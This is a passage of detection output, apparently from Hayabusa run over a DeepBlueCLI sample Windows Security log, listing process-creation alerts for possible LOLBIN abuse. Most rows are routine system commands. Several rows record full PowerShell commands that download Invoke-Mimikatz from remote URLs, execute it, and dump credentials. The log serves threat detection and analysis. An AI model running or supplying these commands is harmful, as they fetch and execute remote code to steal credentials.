5662016-08-22 07:31:56.834 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\IEUser\AppData\Local\Temp\kyk3rvnx.cmdline" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x980 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5672016-08-22 07:31:57.381 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\PING.EXE" "Local CMOS Clock" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe5c | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5682016-08-22 07:31:57.397 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\PING.EXE" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x7dc | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5692016-08-22 07:37:26.756 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5702016-08-23 09:13:00.062 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5712016-08-23 09:13:02.593 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x920 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5722016-08-23 09:15:59.673 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0xdfc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5732016-08-23 09:23:16.845 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20160823002316.log C:\Windows\Logs\CBS\CbsPersist_20160823002316.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xf7c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5742016-08-23 09:28:51.548 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x3d0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5752016-08-23 09:28:51.611 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5762016-08-23 09:28:51.626 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5772016-08-23 09:30:51.548 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5782016-08-25 06:17:10.062 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x478 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5792016-08-25 06:17:10.109 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5802016-08-25 06:20:07.546 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0xe90 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5812016-08-25 06:21:09.562 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5822016-08-25 06:21:09.578 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{6D9A7A40-DDCA-414E-B48E-DFB032C03C1B} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5832016-08-25 06:25:05.171 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd10 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5842016-08-25 06:25:05.171 +09:00IE10Win74688highResDevRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5852016-08-25 06:25:59.734 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4a8 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5862016-08-25 06:25:59.734 +09:00IE10Win74688highResDevRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5872016-08-25 06:26:37.046 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" "IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ec | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5882016-08-25 06:26:37.046 +09:00IE10Win74688highResDevRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5892016-08-25 06:27:31.828 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7a4 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5902016-08-25 06:27:31.828 +09:00IE10Win74688highResDevRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5912016-08-25 06:28:35.375 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\wuauclt.exe" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb3c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5922016-08-25 06:29:40.093 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" | Path: C:\Windows\System32\mmc.exe | PID: 0xf74 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5932016-08-25 06:30:06.203 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5942016-08-25 06:30:06.203 +09:00IE10Win74688highResDevRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5952016-08-25 06:38:23.076 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5962016-08-25 06:38:23.076 +09:00IE10Win74688highResDevRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5972016-08-25 06:51:10.232 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4fc | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5982016-08-25 06:51:10.232 +09:00IE10Win74688highResDevRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5992016-08-25 06:51:19.681 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6002016-08-25 06:51:19.681 +09:00IE10Win74688highResDevRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6012016-08-25 07:00:00.553 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0x97c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6022016-08-25 07:01:50.906 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6032016-08-25 07:01:50.943 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x904 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6042016-08-25 07:42:19.877 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6052016-08-25 07:42:28.120 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbf4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6062016-08-25 07:42:44.834 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6072016-08-25 07:43:00.291 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6082016-08-25 07:43:04.576 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\IEUser\AppData\Local\Temp\hp2phgfx.cmdline" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xd50 | User: IEUser | LID: 0x4d011rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6092016-08-25 07:44:00.792 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6102016-08-25 07:44:00.843 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6112016-08-25 07:44:02.654 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\IEUser\AppData\Local\Temp\lnyiquaj.cmdline" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x818 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6122016-08-25 07:45:43.530 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6132016-08-25 07:45:43.908 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6142016-08-25 07:45:45.304 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\IEUser\AppData\Local\Temp\zqai1ke3.cmdline" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb8c | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6152016-08-25 07:45:54.936 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe48 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6162016-08-25 07:45:54.972 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf88 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6172016-08-25 07:45:57.041 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\IEUser\AppData\Local\Temp\lygfnats.cmdline" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x21c | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6182016-08-25 07:47:33.985 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcd8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6192016-08-25 07:47:34.016 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6202016-08-25 07:49:42.000 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\findstr.exe" "Command Line" | Path: C:\Windows\System32\findstr.exe | PID: 0x708 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6212016-08-25 07:50:40.032 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\findstr.exe" Command | Path: C:\Windows\System32\findstr.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6222016-08-25 07:53:47.579 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\findstr.exe" "Command Line" | Path: C:\Windows\System32\findstr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6232016-08-25 07:54:04.375 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\findstr.exe" "Command Line" | Path: C:\Windows\System32\findstr.exe | PID: 0xb78 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6242016-08-25 07:59:07.782 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\findstr.exe" csc | Path: C:\Windows\System32\findstr.exe | PID: 0x9c8 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6252016-08-25 08:01:26.782 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6262016-08-25 08:01:26.782 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x5b8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
